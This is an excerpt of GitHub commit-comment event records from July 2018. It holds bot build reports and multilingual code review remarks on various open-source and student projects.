href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T19:37:24Z"}
{"id":"8046233007","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29910366,"position":null,"line":null,"path":null,"commit_id":"91e22ddb351ba7a00ea0fee8c77242ff91fe1a4f","created_at":"2018-07-31T19:37:27Z","updated_at":"2018-07-31T19:37:27Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/91e22ddb351ba7a00ea0fee8c77242ff91fe1a4f/index.html"}},"created_at":"2018-07-31T19:37:27Z"}
{"id":"8046234449","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910370,"position":10,"line":7,"path":"schedule.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:37:47Z","updated_at":"2018-07-31T19:37:47Z","author_association":"NONE","body":"Я имел в в виду вынести дату в параметр функций для получения расписания. Так конечно тоже можно, но..."}},"created_at":"2018-07-31T19:37:47Z"}
{"id":"8046239818","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910387,"position":6,"line":5,"path":"schedule.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:38:53Z","updated_at":"2018-07-31T19:38:53Z","author_association":"NONE","body":"Наследование? Расписание есть предмет? О_о"}},"created_at":"2018-07-31T19:38:53Z"}
{"id":"8046240366","type":"CommitCommentEvent","actor":{"login":"Dsvm97"},"repo":{"name":"Alevsk/Java-Genetic-Algorithm"},"payload":{"comment":{"id":29910390,"position":29,"line":29,"path":"branch_list.txt","commit_id":"f9de44e79cc2bc59c823b0f9650a94ccf93a0a58","created_at":"2018-07-31T19:38:59Z","updated_at":"2018-07-31T19:38:59Z","author_association":"NONE","body":"sdf"}},"created_at":"2018-07-31T19:38:59Z"}
{"id":"8046241875","type":"CommitCommentEvent","actor":{"login":"MJVL"},"repo":{"name":"vasilescur/GE-Intern-C-Obfuscation-Challenge"},"payload":{"comment":{"id":29910400,"position":null,"line":null,"path":null,"commit_id":"6bac729e62bd7dce67ef94eedf8af5df978ac3f9","created_at":"2018-07-31T19:39:18Z","updated_at":"2018-07-31T19:39:18Z","author_association":"COLLABORATOR","body":"Thank you for merging this essential change. "}},"created_at":"2018-07-31T19:39:18Z"}
{"id":"8046243252","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"liferay/liferay-docs"},"payload":{"comment":{"id":29910404,"position":30,"line":19,"path":"discover/portal/articles/140-workflow/04-reviewing-assets.markdown","commit_id":"0288d08f57a231759866b6c072ac8452891dec50","created_at":"2018-07-31T19:39:36Z","updated_at":"2018-07-31T19:39:36Z","author_association":"MEMBER","body":"@rbohl - I can't find this article. Can you find the article this should link to? Thanks."}},"created_at":"2018-07-31T19:39:36Z"}
{"id":"8046243951","type":"CommitCommentEvent","actor":{"login":"vasilescur"},"repo":{"name":"vasilescur/GE-Intern-C-Obfuscation-Challenge"},"payload":{"comment":{"id":29910408,"position":null,"line":null,"path":null,"commit_id":"6bac729e62bd7dce67ef94eedf8af5df978ac3f9","created_at":"2018-07-31T19:39:43Z","updated_at":"2018-07-31T19:39:43Z","author_association":"OWNER","body":"Yes."}},"created_at":"2018-07-31T19:39:43Z"}
{"id":"8046246260","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29910413,"position":null,"line":null,"path":null,"commit_id":"e5dbe9583b98d15b96f417f9e448031fecf614c1","created_at":"2018-07-31T19:40:14Z","updated_at":"2018-07-31T19:40:14Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/a8e11403-db53-4f2a-b6bb-e40bad9f1409\n"}},"created_at":"2018-07-31T19:40:14Z"}
{"id":"8046250681","type":"CommitCommentEvent","actor":{"login":"sthaiya"},"repo":{"name":"dilekamadushan/muzima-android"},"payload":{"comment":{"id":29910421,"position":51,"line":66,"path":"app/src/main/java/com/muzima/view/reports/PatientReportListViewActivity.java","commit_id":"bc2aa147d8e3c3ae9648ea1978e95c8890644e55","created_at":"2018-07-31T19:41:09Z","updated_at":"2018-07-31T19:41:09Z","author_association":"NONE","body":"Use NotificationsListActivity.java as an example of how to download in background"}},"created_at":"2018-07-31T19:41:09Z"}
{"id":"8046251681","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29910424,"position":null,"line":null,"path":null,"commit_id":"ba4ebc101f09a198b72007299b19a25e6a1679a6","created_at":"2018-07-31T19:41:21Z","updated_at":"2018-07-31T19:41:21Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-477](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-477).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-477-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T19:41:21Z"}
{"id":"8046252335","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910427,"position":10,"line":7,"path":"schedule.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:41:29Z","updated_at":"2018-07-31T19:41:29Z","author_association":"NONE","body":"придется каждый раз новый объект создавать."}},"created_at":"2018-07-31T19:41:29Z"}
{"id":"8046253399","type":"CommitCommentEvent","actor":{"login":"KeitIG"},"repo":{"name":"ifischer/museeks"},"payload":{"comment":{"id":29910432,"position":null,"line":null,"path":null,"commit_id":"aceea7cac08a43681fc5230012f3cce29568c12c","created_at":"2018-07-31T19:41:43Z","updated_at":"2018-07-31T19:41:43Z","author_association":"NONE","body":"Hoy @ifischer,\r\n\r\nIs this is feature you expect in your music players? I would not use it, but If there is enough traction I may be willing to merge it back to the main project :)"}},"created_at":"2018-07-31T19:41:43Z"}
{"id":"8046255283","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910437,"position":10,"line":7,"path":"schedule.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:42:08Z","updated_at":"2018-07-31T19:42:08Z","author_association":"NONE","body":"Либо сеттер сделай, либо вынеси в параметр."}},"created_at":"2018-07-31T19:42:08Z"}
{"id":"8046260958","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"liferay/liferay-docs"},"payload":{"comment":{"id":29910461,"position":30,"line":19,"path":"discover/portal/articles/140-workflow/04-reviewing-assets.markdown","commit_id":"0288d08f57a231759866b6c072ac8452891dec50","created_at":"2018-07-31T19:43:17Z","updated_at":"2018-07-31T19:43:17Z","author_association":"MEMBER","body":"@jhinkey, sorry, it's acutally a developer article: https://dev.liferay.com/develop/tutorials/-/knowledge_base/7-1/workflow-task-nodes#assignments\r\n\r\n`/develop/tutorials/-/knowledge_base/7-1/workflow-task-nodes#assignments`"}},"created_at":"2018-07-31T19:43:17Z"}
{"id":"8046266572","type":"CommitCommentEvent","actor":{"login":"rhodges"},"repo":{"name":"Ecotrust/ucsrb"},"payload":{"comment":{"id":29910474,"position":null,"line":null,"path":null,"commit_id":"d17ff4ed9b7e8e2ee3778f7ada5a8dfc5c62c9d6","created_at":"2018-07-31T19:44:25Z","updated_at":"2018-07-31T19:44:25Z","author_association":"MEMBER","body":"Not fixed - in fact this breaks reporting entirely. Right idea, wrong line of code."}},"created_at":"2018-07-31T19:44:25Z"}
{"id":"8046266691","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29910476,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T19:44:27Z","updated_at":"2018-07-31T19:44:27Z","author_association":"CONTRIBUTOR","body":"removed list borders app-wide. check last commit."}},"created_at":"2018-07-31T19:44:27Z"}
{"id":"8046270791","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910487,"position":3,"line":3,"path":"lesson.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:45:15Z","updated_at":"2018-07-31T19:45:15Z","author_association":"NONE","body":"Я не имел в виду создать класс Lesson, в методы которого ты будешь передавать данные о предмете чтобы их парсить и возвращать. Я имел ввиду создать класс Lesson в конструктор которого ты передаешь данные, он запишет их в поля, и ты будешь работать с Lesson как с объектом. "}},"created_at":"2018-07-31T19:45:15Z"}
{"id":"8046275667","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29910493,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T19:46:14Z","updated_at":"2018-07-31T19:46:14Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T19:46:14Z"}
{"id":"8046275923","type":"CommitCommentEvent","actor":{"login":"erg"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":29910494,"position":5,"line":37,"path":"Factor.app/Contents/Info.plist","commit_id":"01d2381696195712ac98882d17b12fbf8d46164c","created_at":"2018-07-31T19:46:17Z","updated_at":"2018-07-31T19:46:17Z","author_association":"MEMBER","body":".99!"}},"created_at":"2018-07-31T19:46:17Z"}
{"id":"8046276682","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29910496,"position":59,"line":47,"path":"test/account-mgmt.test.js","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-31T19:46:25Z","updated_at":"2018-07-31T19:46:25Z","author_association":"OWNER","body":"good call, thanks"}},"created_at":"2018-07-31T19:46:25Z"}
{"id":"8046277662","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29910498,"position":null,"line":null,"path":null,"commit_id":"dd244cbf362353914062a467c4052ae32a770581","created_at":"2018-07-31T19:46:38Z","updated_at":"2018-07-31T19:46:38Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-129](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-129).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-129-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-31T19:46:38Z"}
{"id":"8046278684","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29910503,"position":328,"line":334,"path":"Lesson_6/lib/main_menu.rb","commit_id":"682b47621761305058ff8a7c9355435982857215","created_at":"2018-07-31T19:46:50Z","updated_at":"2018-07-31T19:46:50Z","author_association":"NONE","body":"в прошлый раз уже намекал ))\r\nТЗ: \"Если введенные данные невалидные, то программа должна вывести сообщение о возникших ошибках и заново запросить данные у пользователя. Реализовать это через механизм обработки исключений\"\r\nв скринкасте есть кусок посвященный вот этому: \"заново.... через механизм обработки исключений\"\r\nты  здесь используешь рекурсию - явный вызов кодом самого себя в 334 строке, а нужно \"через механизм обработки исключений\" заставить код еще раз отработать\r\nэто где-то в середине скринкаста рассматривается, мне кажется\r\nметод `retry`"}},"created_at":"2018-07-31T19:46:50Z"}
{"id":"8046283069","type":"CommitCommentEvent","actor":{"login":"Huxpro"},"repo":{"name":"mhallin/graphql_ppx"},"payload":{"comment":{"id":29910506,"position":63,"line":98,"path":"README.md","commit_id":"0104037b9592a0f81ddc6df32fd22ac62c854b6d","created_at":"2018-07-31T19:47:43Z","updated_at":"2018-07-31T19:47:43Z","author_association":"CONTRIBUTOR","body":"This is super annoying since what I encountered was that `../somedir/blah` works while `../../somedir/blah` or `../somedir/somedir/blah` might not and there are cases that Bs works but Merlin cannot find the path correctly. There is definitely some weird escaping/parsing-inconsistency there between BuckleScript and Merlin :( "}},"created_at":"2018-07-31T19:47:43Z"}
{"id":"8046284537","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29910509,"position":11,"line":11,"path":"Homework10/ex1/ThreadEx1No3.java","commit_id":"94668b619bceadbd73bfaf1e1256233d3c098d2d","created_at":"2018-07-31T19:48:01Z","updated_at":"2018-07-31T19:48:01Z","author_association":"OWNER","body":"нам тут було б достатньо мати не три, а один клас і в нього передавати потрібний месадж"}},"created_at":"2018-07-31T19:48:01Z"}
{"id":"8046286127","type":"CommitCommentEvent","actor":{"login":"Huxpro"},"repo":{"name":"mhallin/graphql_ppx"},"payload":{"comment":{"id":29910521,"position":71,"line":104,"path":"README.md","commit_id":"0104037b9592a0f81ddc6df32fd22ac62c854b6d","created_at":"2018-07-31T19:48:20Z","updated_at":"2018-07-31T19:48:20Z","author_association":"CONTRIBUTOR","body":"Thx for you re-phasing!"}},"created_at":"2018-07-31T19:48:20Z"}
{"id":"8046290880","type":"CommitCommentEvent","actor":{"login":"unbridledwharf9"},"repo":{"name":"tronprotocol/java-tron"},"payload":{"comment":{"id":29910528,"position":4,"line":4,"path":".codeclimate.yml","commit_id":"ddfe87b632187714b909216ab71674387aa36326","created_at":"2018-07-31T19:49:15Z","updated_at":"2018-07-31T19:49:15Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-31T19:49:15Z"}
{"id":"8046292568","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":29910530,"position":5,"line":37,"path":"Factor.app/Contents/Info.plist","commit_id":"01d2381696195712ac98882d17b12fbf8d46164c","created_at":"2018-07-31T19:49:35Z","updated_at":"2018-07-31T19:49:35Z","author_association":"MEMBER","body":"a463214d1086885e3e97ab8c8d426f5a5feb4243\n\n\nOn Tue, Jul 31, 2018 at 12:46 PM Doug Coleman <notifications@github.com>\nwrote:\n\n> .99!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/factor/factor/commit/01d2381696195712ac98882d17b12fbf8d46164c#commitcomment-29910494>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AABeg37usS5dxkDYywz80lU6GM7LiofVks5uMLQKgaJpZM4VpNRJ>\n> .\n>\n"}},"created_at":"2018-07-31T19:49:35Z"}
{"id":"8046292941","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29910531,"position":13,"line":13,"path":"Homework10/ex2/MainL10Ex2.java","commit_id":"68fe375ecc42780f9c96c0be9fbfdc68c28e8c91","created_at":"2018-07-31T19:49:39Z","updated_at":"2018-07-31T19:49:39Z","author_association":"OWNER","body":"треба було зробити дедлок між мейном і одним з потоків"}},"created_at":"2018-07-31T19:49:39Z"}
{"id":"8046295156","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29910535,"position":15,"line":22,"path":"contracts/Splitter.sol","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-31T19:50:03Z","updated_at":"2018-07-31T19:50:03Z","author_association":"OWNER","body":"thank you"}},"created_at":"2018-07-31T19:50:03Z"}
{"id":"8046297939","type":"CommitCommentEvent","actor":{"login":"Huxpro"},"repo":{"name":"mhallin/graphql_ppx"},"payload":{"comment":{"id":29910550,"position":null,"line":null,"path":null,"commit_id":"f909e49620b6c005fb1ffa03a1a1749e93ec61a2","created_at":"2018-07-31T19:50:32Z","updated_at":"2018-07-31T19:50:32Z","author_association":"CONTRIBUTOR","body":"Woooo could you explain more on that?\r\nI thought everything under `Pervasive` is cross-platform 😢 \r\nHow to figure out what is really compatible on Windows?"}},"created_at":"2018-07-31T19:50:32Z"}
{"id":"8046298502","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29910551,"position":99,"line":73,"path":"Lesson_6/lib/output_helper.rb","commit_id":"682b47621761305058ff8a7c9355435982857215","created_at":"2018-07-31T19:50:38Z","updated_at":"2018-07-31T19:50:38Z","author_association":"NONE","body":"здесь и еще в нескольких методах - присвоение в переменную не имеет смысла\r\nона не используется\r\nправильная реализация в строке 38"}},"created_at":"2018-07-31T19:50:38Z"}
{"id":"8046300267","type":"CommitCommentEvent","actor":{"login":"ferm10n"},"repo":{"name":"avil13/vue-sweetalert2"},"payload":{"comment":{"id":29910553,"position":13,"line":12,"path":"src/index.js","commit_id":"23c09927110939ce3a6d17cbcfc0e8115707a32d","created_at":"2018-07-31T19:50:58Z","updated_at":"2018-07-31T19:50:58Z","author_association":"NONE","body":"That would help my case, but that would not cover all the other cases swal might be used. For example, the `onOpen` and `onClose` callbacks that get set in the options you pass into `$swal()`. There are more cases too https://sweetalert2.github.io/#usage\r\n\r\nI think your project should focus on simply providing sweetalert2 as a Vue plugin. If someone needs to override this in nodejs like inside of a unit test, they could use a mock: https://vue-test-utils.vuejs.org/api/options.html#mocks\r\n\r\nI was just curious what your motivation for the change was in the first place. My recommendation is that this change belongs in a vue-sweetalert2@2.0.0 version, since it would be a breaking change for anyone trying to use this, and then make a new patch on the @1.x.x that reverts the behavior."}},"created_at":"2018-07-31T19:50:58Z"}
{"id":"8046300566","type":"CommitCommentEvent","actor":{"login":"y0urself"},"repo":{"name":"aircrack-ng/rtl8812au"},"payload":{"comment":{"id":29910554,"position":null,"line":null,"path":null,"commit_id":"f221a169f281dab9756a176ec2abd91e0eba7d19","created_at":"2018-07-31T19:51:02Z","updated_at":"2018-07-31T19:51:02Z","author_association":"NONE","body":"Thanks to.\r\nHave fixed driver for my AC53. :)"}},"created_at":"2018-07-31T19:51:02Z"}
{"id":"8046303891","type":"CommitCommentEvent","actor":{"login":"timokau"},"repo":{"name":"Singular/Sources"},"payload":{"comment":{"id":29910558,"position":null,"line":null,"path":null,"commit_id":"4d8cea0593f05b8294ebd7fa3cb8b5a11b049b14","created_at":"2018-07-31T19:51:42Z","updated_at":"2018-07-31T19:51:42Z","author_association":"NONE","body":"Since apparently its impossible for me to reply on the [trac post](https://www.singular.uni-kl.de:8002/trac/ticket/833#comment:1): Thanks for the quick fix! Makes sense that the pthread issue is pretty compiler dependent, I think i was using gcc8."}},"created_at":"2018-07-31T19:51:42Z"}
{"id":"8046305841","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29910563,"position":null,"line":null,"path":null,"commit_id":"8482c9152858dc4c46c7c4c7e8f6406b9f829444","created_at":"2018-07-31T19:52:07Z","updated_at":"2018-07-31T19:52:07Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-310](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-310).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-310-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T19:52:07Z"}
{"id":"8046307180","type":"CommitCommentEvent","actor":{"login":"klarycantone"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29910567,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T19:52:21Z","updated_at":"2018-07-31T19:52:21Z","author_association":"NONE","body":"\n\npublic class PlacesApi {\npublic static final AutocompleteResultType DEFAULT_RESULT_TYPE = AutocompleteResultType.ADDRESS;\nprivate static final String PLACES_API_BASE = \"https://maps.googleapis.com/maps/api/place\";\nprivate static final String PATH_AUTOCOMPLETE = \"autocomplete\";\nprivate static final String PATH_DETAILS = \"details\";\nprivate static final String PATH_JSON = \"json\";\nprivate static final String PARAMETER_LOCATION = \"location\";\nprivate static final String PARAMETER_RADIUS = \"radius\";\nprivate static final String PARAMETER_INPUT = \"input\";\nprivate static final String PARAMETER_KEY = \"key\";\nprivate static final String PARAMETER_TYPE = \"types\";\nprivate static final String PARAMETER_PLACE_ID = \"placeid\";\nprivate static final String PARAMETER_LANGUAGE = \"language\";\nprivate static final String PARAMETER_COMPONENT_CITY= \"locality:\";\nprivate static final String PARAMETER_COMPONENT_COUNTRY = \"country:\";\nprivate static final String PARAMETER_COMPONENETS = \"components\";\nprivate static final Long NO_BIAS_RADIUS = 20000000L;\nprivate static final Location NO_BIAS_LOCATION;\nstatic {\nNO_BIAS_LOCATION = new Location(\"none\");\nNO_BIAS_LOCATION.setLatitude(0.0d);\nNO_BIAS_LOCATION.setLongitude(0.0d);\n}\n@NonNull\nprivate final PlacesHttpClient httpClient;\n@NonNull\nprivate final String googleApiKey;\n@Nullable\nprivate Location currentLocation;\n@Nullable\nprivate Long radiusM;\n@Nullable\nprivate String languageCode;\nprivate boolean locationBiasEnabled = true;\npublic PlacesApi(@NonNull final PlacesHttpClient httpClient, @NonNull final String googleApiKey) {\nthis.httpClient = httpClient;\nthis.googleApiKey = googleApiKey;\n}\n/**\n* @return if the Places API is currently going to return results biased to the device's current\n* location\n*/\npublic boolean isLocationBiasEnabled() {\nreturn locationBiasEnabled;\n}\n--\nInviato da Libero Mail per Android Martedì, 31 Luglio 2018, 09:36PM +02:00 da Hans Erik  notifications@github.com :\n\n>I give you plentiful of help here and you still want me to write your code\n>—\n>You are receiving this because you commented.\n>Reply to this email directly,  view it on GitHub , or  mute the thread ."}},"created_at":"2018-07-31T19:52:21Z"}
{"id":"8046309505","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910570,"position":3,"line":3,"path":"lesson.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:52:49Z","updated_at":"2018-07-31T19:52:49Z","author_association":"NONE","body":"То есть примерно так:\r\n```py\r\nfor lesson in getDaySchedule(day)['lessons]:\r\n  lesson = Lesson(lesson)\r\n  lesson.getLessonType()\r\n  lesson. getGroupsNumbers()\r\n\r\n```"}},"created_at":"2018-07-31T19:52:49Z"}
{"id":"8046312459","type":"CommitCommentEvent","actor":{"login":"Huxpro"},"repo":{"name":"mhallin/graphql_ppx"},"payload":{"comment":{"id":29910582,"position":null,"line":null,"path":null,"commit_id":"f909e49620b6c005fb1ffa03a1a1749e93ec61a2","created_at":"2018-07-31T19:53:23Z","updated_at":"2018-07-31T19:53:23Z","author_association":"CONTRIBUTOR","body":"OH the CI gave an error for that!\r\nhttps://ci.appveyor.com/project/mhallin/graphql-ppx/build/1.0.147/job/gtnteexhtb9a84kk\r\nhow can that be!? 😮 "}},"created_at":"2018-07-31T19:53:23Z"}
{"id":"8046313678","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29910586,"position":null,"line":null,"path":null,"commit_id":"d44964f4593d0d811c513bf42d9a81c2d146aecd","created_at":"2018-07-31T19:53:38Z","updated_at":"2018-07-31T19:53:38Z","author_association":"CONTRIBUTOR","body":"I'll take a look then"}},"created_at":"2018-07-31T19:53:38Z"}
{"id":"8046314031","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29910587,"position":null,"line":null,"path":null,"commit_id":"549c1d999d23a36c02ac5416020dba8a6d94c759","created_at":"2018-07-31T19:53:42Z","updated_at":"2018-07-31T19:53:42Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Filtrace výjimek v adminu](https://trello.com/c/lNwF76Ev/672-2-filtrace-v%C3%BDjimek-v-adminu)"}},"created_at":"2018-07-31T19:53:42Z"}
{"id":"8046314556","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29910588,"position":null,"line":null,"path":null,"commit_id":"313160637dd4dd56e39b0b21ee948b914e4f0d71","created_at":"2018-07-31T19:53:48Z","updated_at":"2018-07-31T19:53:48Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/solarlog-binding-invalid-json-when-refreshing-source-error-paperui-stays-on-initializing/48655/6\n"}},"created_at":"2018-07-31T19:53:48Z"}
{"id":"8046317633","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29910593,"position":null,"line":null,"path":null,"commit_id":"181c488ab37e3b4c7c4fa9c42d4e7bb834fa6ddc","created_at":"2018-07-31T19:54:24Z","updated_at":"2018-07-31T19:54:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-592](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-592).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-592-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T19:54:24Z"}
{"id":"8046318798","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29910596,"position":31,"line":31,"path":"HomeWork10/Task2.java","commit_id":"f48fe41bc13a97e3555ebc977446e434c5ed40f7","created_at":"2018-07-31T19:54:38Z","updated_at":"2018-07-31T19:54:38Z","author_association":"OWNER","body":"тут можна стартувати лише потік t1, а ресурси локати в цьому потоці та в основному потоці методу main()"}},"created_at":"2018-07-31T19:54:38Z"}
{"id":"8046319997","type":"CommitCommentEvent","actor":{"login":"harishchilamkurthi"},"repo":{"name":"harishchilamkurthi/TheRecipeBook-Web"},"payload":{"comment":{"id":29910599,"position":null,"line":null,"path":null,"commit_id":"2462a45090f34819f22fa703409996c35a407351","created_at":"2018-07-31T19:54:53Z","updated_at":"2018-07-31T19:54:53Z","author_association":"OWNER","body":"the goal is to removed ngFor from inside item, and pass down the individual item or each iteration to that component, so that we can still output recipe name"}},"created_at":"2018-07-31T19:54:53Z"}
{"id":"8046322795","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29910604,"position":6,"line":269,"path":"app/arpa_components/arpa-company/arpa-company.html","commit_id":"5a8ff6bb533706f46506f4ad4fabb355c95a499d","created_at":"2018-07-31T19:55:26Z","updated_at":"2018-07-31T19:55:26Z","author_association":"OWNER","body":"Lo unico que habia que hacer es validar si el `filePathToRemove` contiene `arpa-preferences.html -> _getLogoUrlDefault()`, cambialo a esta manera.\r\n\r\n`if (!this.company.recordKey) {` actualizarlo asap"}},"created_at":"2018-07-31T19:55:26Z"}
{"id":"8046322986","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29910605,"position":null,"line":null,"path":null,"commit_id":"44e593cf6b3eed397370b66f949473eae97656d2","created_at":"2018-07-31T19:55:29Z","updated_at":"2018-07-31T19:55:29Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T19:55:29Z"}
{"id":"8046323589","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29910607,"position":null,"line":null,"path":null,"commit_id":"ccccf8810c8341c00324d6282a9ec8df8adef617","created_at":"2018-07-31T19:55:36Z","updated_at":"2018-07-31T19:55:36Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/ccccf8810c8341c00324d6282a9ec8df8adef617/index.html"}},"created_at":"2018-07-31T19:55:36Z"}
{"id":"8046323939","type":"CommitCommentEvent","actor":{"login":"micahalcorn"},"repo":{"name":"OriginProtocol/origin-devops"},"payload":{"comment":{"id":29910608,"position":null,"line":null,"path":null,"commit_id":"283f54a77e7dcd9d8c5ef4ffcbeaa6d134598aa6","created_at":"2018-07-31T19:55:40Z","updated_at":"2018-07-31T19:55:40Z","author_association":"MEMBER","body":"🎉 Thanks @ambertch!"}},"created_at":"2018-07-31T19:55:40Z"}
